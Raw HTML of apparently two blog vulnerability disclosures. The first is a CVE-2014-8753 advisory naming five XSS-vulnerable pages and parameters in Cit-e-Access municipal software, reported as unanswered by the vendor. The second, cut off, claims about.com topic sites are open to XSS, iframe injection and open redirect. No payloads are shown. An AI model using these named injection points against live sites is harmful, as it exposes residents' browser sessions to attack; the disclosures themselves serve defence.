<a href="http://1.bp.blogspot.com/-i4WxuYQ10hc/VXOxdKlOyeI/AAAAAAAAA_s/Ur59-svSJ9A/s1600/cit_e_net.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://1.bp.blogspot.com/-i4WxuYQ10hc/VXOxdKlOyeI/AAAAAAAAA_s/Ur59-svSJ9A/s400/cit_e_net.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong><br /></strong><strong>CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong></span></div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Product: Cit-e-Access</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: Cit-e-Net</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: Version 6</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: Version 6</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: February 12, 2015</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: June 01, 2015</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Scripting [CWE-79]</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: CVE-2014-8753</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Author: <span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (</span><a href="https://twitter.com/justqdjing/status/565810093564772352">@justqdjing</a><span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Instruction Details:</span></strong></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vendor & Product Description:</span></strong><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version: </span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Version 6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download: </span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net can be downloaded from here,</span></div>
<div>
<a data-mce-href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.cit-e.net/<wbr></wbr>citeadmin/help/<wbr></wbr>cntrainingmanualhowto.pdf</span></a></div>
<div>
<a data-mce-href="http://demo.cit-e.net/" href="http://demo.cit-e.net/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://demo.cit-e.net/</span></a></div>
<div>
<a data-mce-href="http://www.cit-e.net/demorequest.cfm" href="http://www.cit-e.net/demorequest.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/<wbr></wbr>demorequest.cfm</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" target="_blank">http://demo.cit-e.net/Cit-e-<wbr></wbr>Access/ServReq/?TID=1&TPID=17</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"We are a premier provider of Internet-based solutions encompassing web site development and modular interactive e-government applications which bring local government, residents and community businesses together.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net provides a suite of on-line interactive services to counties, municipalities, and other government agencies, that they in turn can offer to their constituents. The municipal government achieves a greater degree of efficiency and timeliness in conducting the daily operations of government, while residents receive improved and easier access to city hall through the on-line access to government services.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Our web-based applications can help your municipality to acheive its e-government goals. Type & click website content-management empowers the municipality to manage the website quickly and easily. Web page styles & formats are customizable by the municipality, and because the foundation is a database application, user security can be set for individual personnel and module applications. Our application modules can either be integrated into your existing municipal web site or implemented as a complete web site solution. It's your choice! Please contact us at info@cit-e.net to view a demonstration of our municipal web site solution if you are an elected official or member of municipal management and your municipality is looking for a cost efficient method for enhancing & improving municipal services. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Interactive Applications</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Service Requests</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Tax Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Utility Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online General-Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Submit Volunteer Resume's Online for the municipality to match your skills with available openings."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access <span style="background-color: white;">web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.</span></span><br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several similar products 0Day vulnerabilities have been found by some other bug hunter researchers before. Cit-i-Access has patched some of them. Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, solutions details related to important vulnerabilities and cyber intelligence.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.1)</strong> The first programming code flaw occurs at "/eventscalendar/index.cfm?" page with "&DID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.2)</strong> The second programming code flaw occurs at "/search/index.cfm?" page with "&keyword" parameter in HTTP POST.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.3)</strong> The third programming code flaw occurs at "/news/index.cfm" page with "&jump2" "&DID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.4)</strong> The fourth programming code flaw occurs at "eventscalendar?" page with "&TPID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.5)</strong> The fifth programming code flaw occurs at "/meetings/index.cfm?" page with "&DID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong>(3) Solutions:</strong></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Leave message to vendor. No response.</span></div>
<div>
<a data-mce-href="http://www.cit-e.net/contact.cfm" href="http://www.cit-e.net/contact.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/contact.<wbr></wbr>cfm</span></a></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">References:</span></strong><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Feb/48">http://seclists.org/fulldisclosure/2015/Feb/48</a></span><br />
<a href="http://lists.openwall.net/full-disclosure/2015/02/13/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/13/2</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587</span></a></div>
<div>
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html</span></a></div>
<div>
<a href="https://computerpitch.wordpress.com/2015/06/07/cve-2014-8753/" style="background-color: white;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computerpitch.<wbr></wbr>wordpress.com/2015/06/07/cve-<wbr></wbr>2014-8753/</span></a><br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://webtechhut.blogspot.com/2015/06/cve-2014-8753.html" target="_blank">http://webtechhut.blogspot.<wbr></wbr>com/2015/06/cve-2014-8753.html</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/804176613035844">https://www.facebook.com/websecuritiesnews/posts/804176613035844</a></span></div>
<div style="background-color: white;">
<div>
<a href="https://twitter.com/tetraphibious/status/607381197077946368" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>607381197077946368</span></a></div>
<div>
<a href="http://biboying.lofter.com/post/1cc9f4f5_7356826" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://biboying.lofter.com/<wbr></wbr>post/1cc9f4f5_7356826</span></a></div>
<div>
<a href="http://shellmantis.tumblr.com/post/120903342496/securitypost-cve-2014-8753-cit-e-net-multiple" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://shellmantis.tumblr.com/<wbr></wbr>post/120903342496/<wbr></wbr>securitypost-cve-2014-8753</span></a></div>
</div>
<div style="background-color: white;">
<a href="http://itprompt.blogspot.com/2015/06/cve-2014-8753.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itprompt.blogspot.com/<wbr></wbr>2015/06/cve-2014-8753.html</span></a></div>
<div style="background-color: white;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155710559404/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155710559404/</span></a></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/113115469311022848114/posts/FomMK9BGGx2" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/<wbr></wbr>113115469311022848114/posts/<wbr></wbr>FomMK9BGGx2</span></a></div>
<div style="background-color: white;">
<a href="https://www.facebook.com/pcwebsecurities/posts/702290949916825"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/pcwebsecurities/posts/702290949916825</span></a></div>
<div style="background-color: white;">
<a href="http://securitypost.tumblr.com/post/120903225352/cve-2014-8753-cit-e-net-multiple-xss" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.<wbr></wbr>com/post/120903225352/cve-<wbr></wbr>2014-8753-cit-e-net</span></a></div>
<div style="background-color: white;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_7355910" style="background-color: transparent;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/<wbr></wbr>post/1cd3e0d3_7355910</span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/" href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/">http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/</a></span><br />
<a data-mce-href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/" href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/cve-2014-8753/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-4729462396683753782015-06-06T04:21:00.000-07:002015-06-06T04:21:30.086-07:00About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Web Security Vulnerabilities<div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About.com all "topic sites" are vulnerable to XSS (Cross-Site Scripting) and Iframe Injection (Cross Frame Scripting) attacks. This means all sub-domains of about.com are affected. Based on a self-written program, 94357 links were tested. Only 118 links do not belong to the topics (Metasites) links. Meanwhile, some about.com main pages are vulnerable to XSS attack, too. This means no more than 0.125% links are not affected. At least 99.875% links of About Group are vulnerable to XSS and Iframe Injection attacks. In fact, for about.com's structure, the main domain is something just like a cover. So, very few links belong to them.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Simultaneously, the About.com main page's search field is vulnerable to XSS attacks, too. This means all domains related to about.com are vulnerable to XSS attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">For the Iframe Injection vulnerability. They can be used to do DDOS (Distributed Denial-of-Service Attack) to other websites, too.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Here is one example of DDOS based on Iframe Injection attacks of others.</span><br />
<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="line-height: 25.5px;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.incapsula.com/blog/<wbr></wbr>world-largest-site-xss-ddos-<wbr></wbr>zombies.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">In the last, some "Open Redirect" vulnerabilities related to about.com are introduced. There may be large number of other Open Redirect Vulnerabilities not detected. Since About.com are trusted by some the other websites. Those vulnerabilities can be used to do "Covert Redirect" to these websites.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Disclosure:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No one replied. Until now, they are still unpatched.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JBGSid9pxUc/VM92x82x65I/AAAAAAAAAow/zGACIsbNAcU/s1600/about_quesion_security_xss1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="http://4.bp.blogspot.com/-JBGSid9pxUc/VM92x82x65I/AAAAAAAAAow/zGACIsbNAcU/s400/about_quesion_security_xss1.jpg" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Discover:</span></b></div>
</div>
<div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/562252555149791233">@Justqdjing</a>)</span></div>
<div>
<a href="http://www.tetraph.com/wangjing"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Some Basic Background</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) Domain Description:</span></b></div>
<div>
<div>
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.alexa.com/siteinfo/about.com">http://www.alexa.com/siteinfo/about.com</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month." (The New York Times)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its "topic sites," of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation, and, for March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month. As of August 2012, About.com is the property of IAC, owner of Ask.com and numerous other online brands, and its revenue is generated by advertising." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"As of May 2013, About.com was receiving about 84 million unique monthly visitors." (TechCrunch. AOL Inc.)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"According to About's online media kit, nearly 1,000 "Experts" (freelance writers) contribute to the site by writing on various topics, including healthcare and travel." (About.com)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.2) Topics Related to About.com</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"The Revolutionary About.com Directory and Community Metasite. Hundreds of real live passionate Guides covering Arts, Entertainment, Business, Industry, Science, Technology, Culture, Health, Fitness, Games,Travel, News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms, Education, Computers, Hobbies and Local Information." (<a href="http://azlist.about.com/" target="_blank">azlist.about.com</a>)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About.com - Sites A to Z </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Number of Topics</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A: 66</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">B: 61</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">C: 118</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">D: 49</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">E: 33</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">F: 57</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">G: 39</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">H: 48</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">I: 32</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">J: 15</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">K: 13</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">L: 36</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">M: 70</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">N: 26</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">O: 23</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">P: 91</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Q: 4</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">R: 32</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">S: 104</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">T: 47</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">U: 12</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">V: 9</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">W: 43</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">X: 1</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Y: 4</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Z: 1</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">SUM: 1039</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Reference:</span></div>
<div>
<a href="http://azlist.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">azlist.about.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">In fact, those are not all topics of about.com. Some of the topics are not listed here such as,</span></div>
<div>
<a href="http://specialchildren.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">So, there are more than 1000 topics related to about.com.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
